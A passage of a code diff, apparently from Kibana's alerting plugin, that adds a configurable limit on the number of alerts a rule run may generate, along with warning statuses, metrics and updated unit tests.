hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'], '3': updatedAlerts['3'] }); @@ -377,17 +431,23 @@ describe('processAlerts', () => { const recoveredAlert1 = new Alert<{}, {}, DefaultActionGroupId>('2'); const recoveredAlert2 = new Alert<{}, {}, DefaultActionGroupId>('3'); - const originalAlerts = { + const existingAlerts = { '1': activeAlert, '2': recoveredAlert1, '3': recoveredAlert2, }; - const updatedAlerts = cloneDeep(originalAlerts); + const updatedAlerts = cloneDeep(existingAlerts); updatedAlerts['1'].scheduleActions('default', { foo: '1' }); - // @ts-expect-error - const { recoveredAlerts } = processAlerts(updatedAlerts, originalAlerts); + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: false, + alertLimit: 10, + }); expect(recoveredAlerts).toEqual({ '2': updatedAlerts['2'], '3': updatedAlerts['3'] }); @@ -410,4 +470,156 @@ describe('processAlerts', () => { expect(recoveredAlert2State.end).not.toBeDefined(); }); }); + + describe('when hasReachedAlertLimit is true', () => { + test('does not calculate recovered alerts', () => { + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new Alert<{}, {}, DefaultActionGroupId>('5'); + const newAlert6 = new Alert<{}, {}, DefaultActionGroupId>('6'); + const newAlert7 = new Alert<{}, {}, DefaultActionGroupId>('7'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = { + ...cloneDeep(existingAlerts), + '6': newAlert6, + '7': newAlert7, + }; + + updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + updatedAlerts['6'].scheduleActions('default', { foo: '2' }); + updatedAlerts['7'].scheduleActions('default', { foo: '2' }); + + const { recoveredAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: 7, + }); + + expect(recoveredAlerts).toEqual({}); + }); + + test('persists existing alerts', () => { + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new Alert<{}, {}, DefaultActionGroupId>('5'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = cloneDeep(existingAlerts); + + updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + + const { activeAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: 7, + }); + + expect(activeAlerts).toEqual({ + '1': updatedAlerts['1'], + '2': updatedAlerts['2'], + '3': updatedAlerts['3'], + '4': updatedAlerts['4'], + '5': existingAlert5, + }); + }); + + test('adds new alerts up to max allowed', () => { + const MAX_ALERTS = 7; + const existingAlert1 = new Alert<{}, {}, DefaultActionGroupId>('1'); + const existingAlert2 = new Alert<{}, {}, DefaultActionGroupId>('2'); + const existingAlert3 = new Alert<{}, {}, DefaultActionGroupId>('3'); + const existingAlert4 = new Alert<{}, {}, DefaultActionGroupId>('4'); + const existingAlert5 = new Alert<{}, {}, DefaultActionGroupId>('5'); + const newAlert6 = new Alert<{}, {}, DefaultActionGroupId>('6'); + const newAlert7 = new Alert<{}, {}, DefaultActionGroupId>('7'); + const newAlert8 = new Alert<{}, {}, DefaultActionGroupId>('8'); + const newAlert9 = new Alert<{}, {}, DefaultActionGroupId>('9'); + const newAlert10 = new Alert<{}, {}, DefaultActionGroupId>('10'); + + const existingAlerts = { + '1': existingAlert1, + '2': existingAlert2, + '3': existingAlert3, + '4': existingAlert4, + '5': existingAlert5, + }; + + const updatedAlerts = { + ...cloneDeep(existingAlerts), + '6': newAlert6, + '7': newAlert7, + '8': newAlert8, + '9': newAlert9, + '10': newAlert10, + }; + + updatedAlerts['1'].scheduleActions('default', { foo: '1' }); + updatedAlerts['2'].scheduleActions('default', { foo: '1' }); + updatedAlerts['3'].scheduleActions('default', { foo: '2' }); + updatedAlerts['4'].scheduleActions('default', { foo: '2' }); + // intentionally not scheduling actions for alert "5" + updatedAlerts['6'].scheduleActions('default', { foo: '2' }); + updatedAlerts['7'].scheduleActions('default', { foo: '2' }); + updatedAlerts['8'].scheduleActions('default', { foo: '2' }); + updatedAlerts['9'].scheduleActions('default', { foo: '2' }); + updatedAlerts['10'].scheduleActions('default', { foo: '2' }); + + const { activeAlerts, newAlerts } = processAlerts({ + // @ts-expect-error + alerts: updatedAlerts, + // @ts-expect-error + existingAlerts, + hasReachedAlertLimit: true, + alertLimit: MAX_ALERTS, + }); + + expect(Object.keys(activeAlerts).length).toEqual(MAX_ALERTS); + expect(activeAlerts).toEqual({ + '1': updatedAlerts['1'], + '2': updatedAlerts['2'], + '3': updatedAlerts['3'], + '4': updatedAlerts['4'], + '5': existingAlert5, + '6': newAlert6, + '7': newAlert7, + }); + expect(newAlerts).toEqual({ + '6': newAlert6, + '7': newAlert7, + }); + }); + }); }); diff --git a/x-pack/plugins/alerting/server/lib/process_alerts.ts b/x-pack/plugins/alerting/server/lib/process_alerts.ts index f4af401e5113c..c0352a06f2eba 100644 --- a/x-pack/plugins/alerting/server/lib/process_alerts.ts +++ b/x-pack/plugins/alerting/server/lib/process_alerts.ts @@ -6,9 +6,19 @@ */ import { millisToNanos } from '@kbn/event-log-plugin/server'; +import { cloneDeep } from 'lodash'; import { Alert } from '../alert'; import { AlertInstanceState, AlertInstanceContext } from '../types'; +interface ProcessAlertsOpts< + State extends AlertInstanceState, + Context extends AlertInstanceContext +> { + alerts: Record>; + existingAlerts: Record>; + hasReachedAlertLimit: boolean; + alertLimit: number; +} interface ProcessAlertsResult< State extends AlertInstanceState, Context extends AlertInstanceContext, @@ -25,11 +35,32 @@ export function processAlerts< Context extends AlertInstanceContext, ActionGroupIds extends string, RecoveryActionGroupId extends string +>({ + alerts, + existingAlerts, + hasReachedAlertLimit, + alertLimit, +}: ProcessAlertsOpts): ProcessAlertsResult< + State, + Context, + ActionGroupIds, + RecoveryActionGroupId +> { + return hasReachedAlertLimit + ? processAlertsLimitReached(alerts, existingAlerts, alertLimit) + : processAlertsHelper(alerts, existingAlerts); +} + +function processAlertsHelper< + State extends AlertInstanceState, + Context extends AlertInstanceContext, + ActionGroupIds extends string, + RecoveryActionGroupId extends string >( alerts: Record>, - originalAlerts: Record> + existingAlerts: Record> ): ProcessAlertsResult { - const originalAlertIds = new Set(Object.keys(originalAlerts)); + const existingAlertIds = new Set(Object.keys(existingAlerts)); const currentTime = new Date().toISOString(); const newAlerts: Record> = {}; @@ -43,7 +74,7 @@ export function processAlerts< activeAlerts[id] = alerts[id]; // if this alert did not exist in previous run, it is considered "new" - if (!originalAlertIds.has(id)) { + if (!existingAlertIds.has(id)) { newAlerts[id] = alerts[id]; // Inject start time into alert state for new alerts @@ -52,7 +83,7 @@ export function processAlerts< } else { // this alert did exist in previous run // calculate duration to date for active alerts - const state = originalAlerts[id].getState(); + const state = existingAlerts[id].getState(); const durationInMs = new Date(currentTime).valueOf() - new Date(state.start as string).valueOf(); const duration = state.start ? millisToNanos(durationInMs) : undefined; @@ -62,7 +93,7 @@ export function processAlerts< ...(duration !== undefined ? { duration } : {}), }); } - } else if (originalAlertIds.has(id)) { + } else if (existingAlertIds.has(id)) { recoveredAlerts[id] = alerts[id]; // Inject end time into alert state of recovered alerts @@ -80,3 +111,76 @@ export function processAlerts< } return { recoveredAlerts, newAlerts, activeAlerts }; } + +function processAlertsLimitReached< + State extends AlertInstanceState, + Context extends AlertInstanceContext, + ActionGroupIds extends string, + RecoveryActionGroupId extends string +>( + alerts: Record>, + existingAlerts: Record>, + alertLimit: number +): ProcessAlertsResult { + const existingAlertIds = new Set(Object.keys(existingAlerts)); + + // When the alert limit has been reached, + // - skip determination of recovered alerts + // - pass through all existing alerts as active + // - add any new alerts, up to the max allowed + + const currentTime = new Date().toISOString(); + const newAlerts: Record> = {}; + + // all existing alerts stay active + const activeAlerts: Record> = cloneDeep( + existingAlerts + ); + + // update duration for existing alerts + for (const id in activeAlerts) { + if (activeAlerts.hasOwnProperty(id)) { + if (alerts.hasOwnProperty(id)) { + activeAlerts[id] = alerts[id]; + } + const state = existingAlerts[id].getState(); + const durationInMs = + new Date(currentTime).valueOf() - new Date(state.start as string).valueOf(); + const duration = state.start ? millisToNanos(durationInMs) : undefined; + activeAlerts[id].replaceState({ + ...state, + ...(state.start ? { start: state.start } : {}), + ...(duration !== undefined ? { duration } : {}), + }); + } + } + + function hasCapacityForNewAlerts() { + return Object.keys(activeAlerts).length < alertLimit; + } + + // if we don't have capacity for new alerts, return + if (!hasCapacityForNewAlerts()) { + return { recoveredAlerts: {}, newAlerts: {}, activeAlerts }; + } + + // look for new alerts and add until we hit capacity + for (const id in alerts) { + if (alerts.hasOwnProperty(id) && alerts[id].hasScheduledActions()) { + // if this alert did not exist in previous run, it is considered "new" + if (!existingAlertIds.has(id)) { + activeAlerts[id] = alerts[id]; + newAlerts[id] = alerts[id]; + + // Inject start time into alert state for new alerts + const state = newAlerts[id].getState(); + newAlerts[id].replaceState({ ...state, start: currentTime, duration: '0' }); + + if (!hasCapacityForNewAlerts()) { + break; + } + } + } + } + return { recoveredAlerts: {}, newAlerts, activeAlerts }; +} diff --git a/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts b/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts index 8551bb00287c7..69c90ed812549 100644 --- a/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts +++ b/x-pack/plugins/alerting/server/lib/rule_execution_status.test.ts @@ -31,6 +31,7 @@ const executionMetrics = { numberOfActiveAlerts: 2, numberOfNewAlerts: 3, numberOfRecoveredAlerts: 13, + hasReachedAlertLimit: false, triggeredActionsStatus: ActionsCompletion.COMPLETE, }; @@ -48,6 +49,7 @@ describe('RuleExecutionStatus', () => { expect(received.numberOfActiveAlerts).toEqual(expected.numberOfActiveAlerts); expect(received.numberOfRecoveredAlerts).toEqual(expected.numberOfRecoveredAlerts); expect(received.numberOfNewAlerts).toEqual(expected.numberOfNewAlerts); + expect(received.hasReachedAlertLimit).toEqual(expected.hasReachedAlertLimit); expect(received.triggeredActionsStatus).toEqual(expected.triggeredActionsStatus); } @@ -89,7 +91,7 @@ describe('RuleExecutionStatus', () => { testExpectedMetrics(metrics!, executionMetrics); }); - test('task state with warning', () => { + test('task state with max executable actions warning', () => { const { status, metrics } = executionStatusFromState({ alertInstances: { a: {} }, metrics: { ...executionMetrics, triggeredActionsStatus: ActionsCompletion.PARTIAL }, @@ -107,6 +109,25 @@ describe('RuleExecutionStatus', () => { triggeredActionsStatus: ActionsCompletion.PARTIAL, }); }); + + test('task state with max alerts warning', () => { + const { status, metrics } = executionStatusFromState({ + alertInstances: { a: {} }, + metrics: { ...executionMetrics, hasReachedAlertLimit: true }, + }); + checkDateIsNearNow(status.lastExecutionDate); + expect(status.warning).toEqual({ + message: translations.taskRunner.warning.maxAlerts, + reason: RuleExecutionStatusWarningReasons.MAX_ALERTS, + }); + expect(status.status).toBe('warning'); + expect(status.error).toBe(undefined); + + testExpectedMetrics(metrics!, { + ...executionMetrics, + hasReachedAlertLimit: true, + }); + }); }); describe('executionStatusFromError()', () => { diff --git a/x-pack/plugins/alerting/server/lib/rule_execution_status.ts b/x-pack/plugins/alerting/server/lib/rule_execution_status.ts index 28eaf24ef8a2d..c852ca5899420 100644 --- a/x-pack/plugins/alerting/server/lib/rule_execution_status.ts +++ b/x-pack/plugins/alerting/server/lib/rule_execution_status.ts @@ -30,26 +30,31 @@ export function executionStatusFromState( ): IExecutionStatusAndMetrics { const alertIds = Object.keys(stateWithMetrics.alertInstances ?? {}); - const hasIncompleteAlertExecution = - stateWithMetrics.metrics.triggeredActionsStatus === ActionsCompletion.PARTIAL; - let status: RuleExecutionStatuses = alertIds.length === 0 ? RuleExecutionStatusValues[0] : RuleExecutionStatusValues[1]; - if (hasIncompleteAlertExecution) { + // Check for warning states + let warning = null; + // We only have a single warning field so prioritizing the alert circuit breaker over the actions circuit breaker + if (stateWithMetrics.metrics.hasReachedAlertLimit) { + status = RuleExecutionStatusValues[5]; + warning = { + reason: RuleExecutionStatusWarningReasons.MAX_ALERTS, + message: translations.taskRunner.warning.maxAlerts, + }; + } else if (stateWithMetrics.metrics.triggeredActionsStatus === ActionsCompletion.PARTIAL) { status = RuleExecutionStatusValues[5]; + warning = { + reason: RuleExecutionStatusWarningReasons.MAX_EXECUTABLE_ACTIONS, + message: translations.taskRunner.warning.maxExecutableActions, + }; } return { status: { lastExecutionDate: lastExecutionDate ?? new Date(), status, - ...(hasIncompleteAlertExecution && { - warning: { - reason: RuleExecutionStatusWarningReasons.MAX_EXECUTABLE_ACTIONS, - message: translations.taskRunner.warning.maxExecutableActions, - }, - }), + ...(warning ? { warning } : {}), }, metrics: stateWithMetrics.metrics, }; diff --git a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts index b27dc37a459e0..f70a36cba0775 100644 --- a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts +++ b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.test.ts @@ -24,6 +24,7 @@ describe('RuleRunMetricsStore', () => { expect(ruleRunMetricsStore.getNumberOfRecoveredAlerts()).toBe(0); expect(ruleRunMetricsStore.getNumberOfNewAlerts()).toBe(0); expect(ruleRunMetricsStore.getStatusByConnectorType('any')).toBe(undefined); + expect(ruleRunMetricsStore.getHasReachedAlertLimit()).toBe(false); }); test('sets and returns numSearches', () => { @@ -77,6 +78,11 @@ describe('RuleRunMetricsStore', () => { expect(ruleRunMetricsStore.getTriggeredActionsStatus()).toBe(ActionsCompletion.PARTIAL); }); + test('sets and returns hasReachedAlertLimit', () => { + ruleRunMetricsStore.setHasReachedAlertLimit(true); + expect(ruleRunMetricsStore.getHasReachedAlertLimit()).toBe(true); + }); + test('gets metrics', () => { expect(ruleRunMetricsStore.getMetrics()).toEqual({ triggeredActionsStatus: 'partial', @@ -88,6 +94,7 @@ describe('RuleRunMetricsStore', () => { numberOfRecoveredAlerts: 11, numberOfTriggeredActions: 5, totalSearchDurationMs: 2, + hasReachedAlertLimit: true, }); }); diff --git a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts index 97fa14214e4f7..edcba1944dc63 100644 --- a/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts +++ b/x-pack/plugins/alerting/server/lib/rule_run_metrics_store.ts @@ -18,6 +18,7 @@ interface State { numberOfActiveAlerts: number; numberOfRecoveredAlerts: number; numberOfNewAlerts: number; + hasReachedAlertLimit: boolean; connectorTypes: { [key: string]: { triggeredActionsStatus: ActionsCompletion; @@ -40,6 +41,7 @@ export class RuleRunMetricsStore { numberOfActiveAlerts: 0, numberOfRecoveredAlerts: 0, numberOfNewAlerts: 0, + hasReachedAlertLimit: false, connectorTypes: {}, }; @@ -84,6 +86,9 @@ export class RuleRunMetricsStore { triggeredActionsStatus: this.getTriggeredActionsStatus(), }; }; + public getHasReachedAlertLimit = () => { + return this.state.hasReachedAlertLimit; + }; // Setters public setNumSearches = (numSearches: number) => { @@ -119,6 +124,9 @@ export class RuleRunMetricsStore { }) => { set(this.state, `connectorTypes["${actionTypeId}"].triggeredActionsStatus`, status); }; + public setHasReachedAlertLimit = (hasReachedAlertLimit: boolean) => { + this.state.hasReachedAlertLimit = hasReachedAlertLimit; + }; // Checkers public hasReachedTheExecutableActionsLimit = (actionsConfigMap: ActionsConfigMap): boolean => diff --git a/x-pack/plugins/alerting/server/mocks.ts b/x-pack/plugins/alerting/server/mocks.ts index fd554783111d2..7abdf04296beb 100644 --- a/x-pack/plugins/alerting/server/mocks.ts +++ b/x-pack/plugins/alerting/server/mocks.ts @@ -104,6 +104,7 @@ const createRuleExecutorServicesMock = < return { alertFactory: { create: jest.fn().mockReturnValue(alertFactoryMockCreate), + hasReachedAlertLimit: jest.fn().mockReturnValue(false), done: jest.fn().mockReturnValue(alertFactoryMockDone), }, savedObjectsClient: savedObjectsClientMock.create(), diff --git a/x-pack/plugins/alerting/server/plugin.test.ts b/x-pack/plugins/alerting/server/plugin.test.ts index 244a8a56ff9e1..87ed23c66ba3c 100644 --- a/x-pack/plugins/alerting/server/plugin.test.ts +++ b/x-pack/plugins/alerting/server/plugin.test.ts @@ -40,6 +40,9 @@ const generateAlertingConfig = (): AlertingConfig => ({ actions: { max: 1000, }, + alerts: { + max: 1000, + }, }, }, }); diff --git a/x-pack/plugins/alerting/server/plugin.ts b/x-pack/plugins/alerting/server/plugin.ts index 83d9c4f99ded8..7450dcb1a45d0 100644 --- a/x-pack/plugins/alerting/server/plugin.ts +++ b/x-pack/plugins/alerting/server/plugin.ts @@ -442,6 +442,7 @@ export class AlertingPlugin { supportsEphemeralTasks: plugins.taskManager.supportsEphemeralTasks(), maxEphemeralActionsPerRule: this.config.maxEphemeralActionsPerAlert, cancelAlertsOnRuleTimeout: this.config.cancelAlertsOnRuleTimeout, + maxAlerts: this.config.rules.run.alerts.max, actionsConfigMap: getActionsConfigMap(this.config.rules.run.actions), usageCounter: this.usageCounter, }); diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts index ea94d7809bfc9..13215b9e2cb20 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner.test.ts @@ -143,6 +143,7 @@ describe('Task Runner', () => { kibanaBaseUrl: 'https://localhost:5601', supportsEphemeralTasks: false, maxEphemeralActionsPerRule: 10, + maxAlerts: 1000, cancelAlertsOnRuleTimeout: true, usageCounter: mockUsageCounter, actionsConfigMap: { @@ -262,7 +263,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 3, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ status: 'ok' }); @@ -343,7 +344,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 4, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -430,7 +431,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":1,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -604,7 +605,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":2,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":2,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":1,"numberOfGeneratedActions":1,"numberOfActiveAlerts":2,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":2,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); expect(mockUsageCounter.incrementCounter).not.toHaveBeenCalled(); } @@ -1119,7 +1120,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -1232,7 +1233,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 5, - `ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}` + `ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":2,"numberOfGeneratedActions":2,"numberOfActiveAlerts":1,"numberOfRecoveredAlerts":1,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}` ); testAlertingEventLogCalls({ @@ -2362,7 +2363,7 @@ describe('Task Runner', () => { ); expect(logger.debug).nthCalledWith( 3, - 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"triggeredActionsStatus":"complete"}' + 'ruleRunMetrics for test:1: {"numSearches":3,"totalSearchDurationMs":23423,"esSearchDurationMs":33,"numberOfTriggeredActions":0,"numberOfGeneratedActions":0,"numberOfActiveAlerts":0,"numberOfRecoveredAlerts":0,"numberOfNewAlerts":0,"hasReachedAlertLimit":false,"triggeredActionsStatus":"complete"}' ); testAlertingEventLogCalls({ @@ -2859,6 +2860,7 @@ describe('Task Runner', () => { setRuleName = true, logAlert = 0, logAction = 0, + hasReachedAlertLimit = false, }: { status: string; ruleContext?: RuleContextOpts; @@ -2873,6 +2875,7 @@ describe('Task Runner', () => { logAction?: number; errorReason?: string; errorMessage?: string; + hasReachedAlertLimit?: boolean; }) { expect(alertingEventLogger.initialize).toHaveBeenCalledWith(ruleContext); expect(alertingEventLogger.start).toHaveBeenCalled(); @@ -2905,6 +2908,7 @@ describe('Task Runner', () => { numberOfRecoveredAlerts: recoveredAlerts, numberOfTriggeredActions: triggeredActions, totalSearchDurationMs: 23423, + hasReachedAlertLimit, triggeredActionsStatus: 'partial', }, status: { @@ -2927,6 +2931,7 @@ describe('Task Runner', () => { numberOfRecoveredAlerts: recoveredAlerts, numberOfTriggeredActions: triggeredActions, totalSearchDurationMs: 23423, + hasReachedAlertLimit, triggeredActionsStatus: 'complete', }, status: { diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner.ts b/x-pack/plugins/alerting/server/task_runner/task_runner.ts index 16d2dac684e47..d5aaacbacc16a 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner.ts @@ -108,6 +108,7 @@ export class TaskRunner< private readonly executionId: string; private readonly ruleTypeRegistry: RuleTypeRegistry; private readonly inMemoryMetrics: InMemoryMetrics; + private readonly maxAlerts: number; private alertingEventLogger: AlertingEventLogger; private usageCounter?: UsageCounter; private searchAbortController: AbortController; @@ -138,6 +139,7 @@ export class TaskRunner< this.cancelled = false; this.executionId = uuid.v4(); this.inMemoryMetrics = inMemoryMetrics; + this.maxAlerts = context.maxAlerts; this.alertingEventLogger = new AlertingEventLogger(this.context.eventLogger); } @@ -228,22 +230,26 @@ export class TaskRunner< executionHandler: ExecutionHandler, ruleRunMetricsStore: RuleRunMetricsStore ) { - const { - actionGroup, - subgroup: actionSubgroup, - context, - state, - } = alert.getScheduledActionOptions()!; - alert.updateLastScheduledActions(actionGroup, actionSubgroup); - alert.unscheduleActions(); - return executionHandler({ - actionGroup, - actionSubgroup, - context, - state, - alertId, - ruleRunMetricsStore, - }); + if (alert.hasScheduledActions()) { + const { + actionGroup, + subgroup: actionSubgroup, + context, + state, + } = alert.getScheduledActionOptions()!; + alert.updateLastScheduledActions(actionGroup, actionSubgroup); + alert.unscheduleActions(); + return executionHandler({ + actionGroup, + actionSubgroup, + context, + state, + alertId, + ruleRunMetricsStore, + }); + } + + return Promise.resolve(); } private async executeRule( @@ -279,6 +285,8 @@ export class TaskRunner< }, } = this.taskInstance; + const ruleRunMetricsStore = new RuleRunMetricsStore(); + const executionHandler = this.getExecutionHandler( ruleId, rule.name, @@ -325,6 +333,16 @@ export class TaskRunner< searchSourceClient, }); + const alertFactory = createAlertFactory< + State, + Context, + WithoutReservedActionGroups + >({ + alerts, + logger: this.logger, + maxAlerts: this.maxAlerts, + canSetRecoveryContext: ruleType.doesSetRecoveryContext ?? false, + }); let updatedRuleTypeState: void | Record; try { const ctx = { @@ -349,15 +367,7 @@ export class TaskRunner< searchSourceClient: wrappedSearchSourceClient.searchSourceClient, uiSettingsClient: this.context.uiSettings.asScopedToClient(savedObjectsClient), scopedClusterClient: wrappedScopedClusterClient.client(), - alertFactory: createAlertFactory< - State, - Context, - WithoutReservedActionGroups - >({ - alerts, - logger: this.logger, - canSetRecoveryContext: ruleType.doesSetRecoveryContext ?? false, - }), + alertFactory, shouldWriteAlerts: () => this.shouldLogAndScheduleActionsForAlerts(), shouldStopExecution: () => this.cancelled, }, @@ -391,15 +401,23 @@ export class TaskRunner< }) ); } catch (err) { - this.alertingEventLogger.setExecutionFailed( - `rule execution failure: ${ruleLabel}`, - err.message - ); - this.logger.error(err, { - tags: [this.ruleType.id, ruleId, 'rule-run-failed'], - error: { stack_trace: err.stack }, - }); - throw new ErrorWithReason(RuleExecutionStatusErrorReasons.Execute, err); + // Check if this error is due to reaching the alert limit + if (alertFactory.hasReachedAlertLimit()) { + this.logger.warn( + `rule execution generated greater than ${this.maxAlerts} alerts: ${ruleLabel}` + ); + ruleRunMetricsStore.setHasReachedAlertLimit(true); + } else { + this.alertingEventLogger.setExecutionFailed( + `rule execution failure: ${ruleLabel}`, + err.message + ); + this.logger.error(err, { + tags: [this.ruleType.id, ruleId, 'rule-run-failed'], + error: { stack_trace: err.stack }, + }); + throw new ErrorWithReason(RuleExecutionStatusErrorReasons.Execute, err); + } } this.alertingEventLogger.setExecutionSucceeded(`rule executed: ${ruleLabel}`); @@ -415,7 +433,6 @@ export class TaskRunner< scopedClusterClientMetrics.esSearchDurationMs + searchSourceClientMetrics.esSearchDurationMs, }; - const ruleRunMetricsStore = new RuleRunMetricsStore(); ruleRunMetricsStore.setNumSearches(searchMetrics.numSearches); ruleRunMetricsStore.setTotalSearchDurationMs(searchMetrics.totalSearchDurationMs); @@ -426,7 +443,12 @@ export class TaskRunner< Context, ActionGroupIds, RecoveryActionGroupId - >(alerts, originalAlerts); + >({ + alerts, + existingAlerts: originalAlerts, + hasReachedAlertLimit: alertFactory.hasReachedAlertLimit(), + alertLimit: this.maxAlerts, + }); logAlerts({ logger: this.logger, diff --git a/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts b/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts index fb2d1be3a3872..088ef6f9a1be4 100644 --- a/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts +++ b/x-pack/plugins/alerting/server/task_runner/task_runner_cancel.test.ts @@ -120,6 +120,7 @@ describe('Task Runner Cancel', () => { 